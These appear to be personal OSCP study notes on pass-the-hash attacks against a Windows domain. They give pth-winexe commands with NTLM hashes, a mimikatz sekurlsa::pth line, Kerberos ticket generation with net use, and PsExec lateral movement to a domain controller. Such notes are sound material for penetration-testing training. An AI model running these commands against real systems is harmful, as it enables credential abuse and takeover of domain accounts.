OSCP Notes
Comment on page

Pass the NTLM hash

winexe -U jenkins/administrator // cmd.exe
tried pth-winexe -U jenkins/administrator // cmd.exe
Paste the NTLM hash when prompted. (this may be the go to!)
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e // cmd
sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
At this point, we have a new PowerShell session that allows us to execute commands as Jeff_Admin.
Let's list the cached Kerberos tickets with klist:
No Kerberos tickets have been cached, but this is expected since the account has not performed an interactive login. However, let's generate a TGT by authenticating to a network share on the domain controller with net use:
PS C:\Windows\system32> net use \\dc01
The command completed successfully.
PS C:\Windows\system32> klist
Now run .\PsExec.exe \dc01 cmd.exe